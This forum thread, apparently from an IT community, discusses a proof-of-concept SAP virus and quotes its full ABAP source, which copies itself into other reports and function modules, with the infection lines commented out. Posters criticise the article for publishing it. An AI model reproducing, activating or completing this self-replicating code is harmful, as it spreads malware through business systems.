There appears to be a new "Proof-of-Concept" Virus being reported. This may be of interest to those of you who run SAP.
More info. can be found HERE
DjM
Printable View
There appears to be a new "Proof-of-Concept" Virus being reported. This may be of interest to those of you who run SAP.
More info. can be found HERE
DjM
This is a pretty ****ed-up article first they issue a chalange:
--------------
"What protects our customers is very deep security and very limited
access to these mission-critical systems. ABAP also requires a skill
set that goes beyond that of most hackers," said Wall.
---------------
then they lead you to instructions:
--------------
REPORT VIRIISOFT. "(C) ViriiWare 2000
* Primer Virus para SAP versión Listados en 24 LÃ*neas de Código
* Efectos: Solo se reproduce en reports y funciones.
* Hay que descomentar las linea para que funcione correctamente.
TABLES TRDIR. DATA: VIN(72) OCCURS 0, VOUT(72) OCCURS 0. "SAPVirii
SELECT NAME INTO SY-TNAME FROM TRDIR WHERE UNAM NE 'Virii' AND
( SUBC = '1' OR ( SUBC = 'I' AND NAME LIKE 'L____U__' ) ).
IF TRDIR-SUBC = 'I'. SY-TVAR0 = 'FUNCTION'. ELSE. SY-TVAR0 = 'REPORT'.
ENDIF. EXIT.
ENDSELECT. CHECK SY-SUBRC = 0.
*update trdir set: name = 'Virii', sqlx = ' ' where name = sy-tname.
READ REPORT SY-TNAME INTO VIN. READ REPORT SY-REPID INTO VOUT.
LOOP AT VIN INTO SY-ENTRY.
TRANSLATE SY-ENTRY TO UPPER CASE. SEARCH SY-ENTRY FOR SY-TVAR0.
CHECK SY-SUBRC = 0 AND SY-ENTRY+0(1) NE '*'.
LOOP AT VIN INTO SY-ENTRY FROM SY-TABIX.
TRANSLATE SY-ENTRY USING '.@'. SEARCH SY-ENTRY FOR '@'.
CHECK SY-SUBRC = 0. SY-WILLI = SY-TABIX + 1. EXIT.
ENDLOOP. EXIT. ENDLOOP. CHECK SY-SUBRC = 0.
LOOP AT VOUT INTO SY-ENTRY.
IF SY-PAGNO = 3. SY-PAGNO = 0. ENDIF.
SEARCH SY-ENTRY FOR 'SAPVirii'.
IF SY-SUBRC = 0. SY-PAGNO = SY-PAGNO + 1. ENDIF.
CHECK SY-PAGNO = 0. DELETE VOUT.
ENDLOOP. INSERT LINES OF VOUT FROM 1 INTO VIN INDEX SY-WILLI.
*insert report sy-tname from vin. CLEAR SY. "<---Virii Activo
*AquÃ* va el código de destrucción o efectos del virus. "SAPVirii
---------------------
whos side are these guys on?
Quote:
--------------
"What protects our customers is very deep security and very limited
access to these mission-critical systems. ABAP also requires a skill
set that goes beyond that of most hackers," said Wall.
---------------
then they lead you to instructions:
--------------
Ya, likely not the brightest way to bring this to peoples attention.
DjM